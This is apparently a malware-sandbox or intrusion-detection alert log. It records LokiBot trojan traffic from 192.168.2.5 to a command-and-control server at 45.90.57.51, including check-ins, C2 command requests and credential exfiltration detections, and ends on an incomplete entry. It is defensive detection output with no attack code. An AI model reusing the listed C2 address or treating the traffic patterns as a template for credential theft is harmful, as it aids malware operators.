ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:11.067189
SID:	2024313
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:35.693093
SID:	2025381
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:17.603710
SID:	2021641
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:09.170149
SID:	2025381
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:01.356159
SID:	2025381
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:35.199755
SID:	2021641
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:27.085627
SID:	2021641
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:28.951650
SID:	2024318
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:19.541569
SID:	2825766
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:20.628600
SID:	2024313
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:47.452852
SID:	2024313
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:28.951650
SID:	2024313
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:20.628600
SID:	2024318
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:47.452852
SID:	2024318
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:52.383820
SID:	2024312
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:52.383820
SID:	2024317
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:55.010656
SID:	2024318
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:11.067189
SID:	2024318
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:12.990169
SID:	2825766
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:25.750611
SID:	2024318
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:11.363615
SID:	2025483
Source Port:	80
Destination Port:	49753
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:37.637986
SID:	2025483
Source Port:	80
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:25.750611
SID:	2024313
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:29.556038
SID:	2825766
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:57.099162
SID:	2825766
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:37.130221
SID:	2024313
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:16.803035
SID:	2825766
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:59.470457
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:52.514469
SID:	2025483
Source Port:	80
Destination Port:	49774
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:53.898131
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:07.768110
SID:	2025483
Source Port:	80
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:43.763044
SID:	2025483
Source Port:	80
Destination Port:	49770
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:41.388891
SID:	2021641
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:52.000180
SID:	2825766
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:19.541569
SID:	2025381
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:53.120055
SID:	2021641
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:05.193094
SID:	2021641
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:18.130281
SID:	2025483
Source Port:	80
Destination Port:	49757
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:30.894418
SID:	2025381
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:37.130221
SID:	2024318
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:30.052185
SID:	2025483
Source Port:	80
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:39.485062
SID:	2825766
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:31.431993
SID:	2024318
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:46.034175
SID:	2025483
Source Port:	80
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:51.232610
SID:	2025381
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:31.431993
SID:	2024313
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:58.862053
SID:	2021641
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:49.343817
SID:	2021641
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:56.970973
SID:	2024318
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:45.151548
SID:	2024318
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:07.071740
SID:	2025381
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:56.970973
SID:	2024313
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:27.656502
SID:	2024313
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:33.811515
SID:	2024313
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:27.656502
SID:	2024318
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:33.811515
SID:	2024318
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:43.623424
SID:	2825766
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:45.151548
SID:	2024313
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:14.907253
SID:	2024318
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:14.907253
SID:	2024313
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:23.333175
SID:	2024318
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:02.627302
SID:	2025381
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:47.045718
SID:	2021641
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:25.211849
SID:	2825766
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:15.699411
SID:	2025381
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:23.333175
SID:	2024313
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:39.020338
SID:	2021641
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:58.862053
SID:	2825766
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:21.133210
SID:	2025483
Source Port:	80
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:25.707920
SID:	2025483
Source Port:	80
Destination Port:	49761
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:17.315322
SID:	2025483
Source Port:	80
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:24.372670
SID:	2025483
Source Port:	80
Destination Port:	49728
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:28.951650
SID:	2825766
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:55.076784
SID:	2024318
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:51.232610
SID:	2024318
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:29.456072
SID:	2025483
Source Port:	80
Destination Port:	49763
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:31.400897
SID:	2025483
Source Port:	80
Destination Port:	49764
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:36.199531
SID:	2025483
Source Port:	80
Destination Port:	49766
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:51.232610
SID:	2024313
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:55.076784
SID:	2024313
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:55.010656
SID:	2825766
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:41.892700
SID:	2025483
Source Port:	80
Destination Port:	49769
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:11.574808
SID:	2025483
Source Port:	80
Destination Port:	49722
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:04.537805
SID:	2025381
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:30.894418
SID:	2021641
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:50.123310
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:39.020338
SID:	2825766
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:55.010656
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:27.085627
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:17.603710
SID:	2024313
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:35.199755
SID:	2024313
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:27.085627
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:35.199755
SID:	2024318
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:45.151548
SID:	2025381
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:27.656502
SID:	2025381
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:37.130221
SID:	2825766
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:17.603710
SID:	2024318
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:39.020338
SID:	2025381
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:28.951650
SID:	2021641
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:11.067189
SID:	2021641
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:21.430034
SID:	2025381
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:30.894418
SID:	2825766
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:36:52.383820
SID:	2021641
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:18.705946
SID:	2021641
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:25.750611
SID:	2021641
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:37:39.532388
SID:	2025483
Source Port:	80
Destination Port:	49736
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:05.694542
SID:	2025483
Source Port:	80
Destination Port:	49750
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

Timestamp:	05/16/24-00:38:13.256185
SID:	2025483
Source Port:	80
Destination Port:	49755
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:37.130221
SID:	2021641
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:43.623424
SID:	2024318
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:53.120055
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:53.898131
SID:	2024318
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:38:53.898131
SID:	2024313
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:43.623424
SID:	2024313
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.5 - Destination IP: 45.90.57.51

Timestamp:	05/16/24-00:37:59.470457
SID:	2024313
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Fake 404 Response - Source IP: 45.90.57.51 - Destination IP: 192.168.2.5

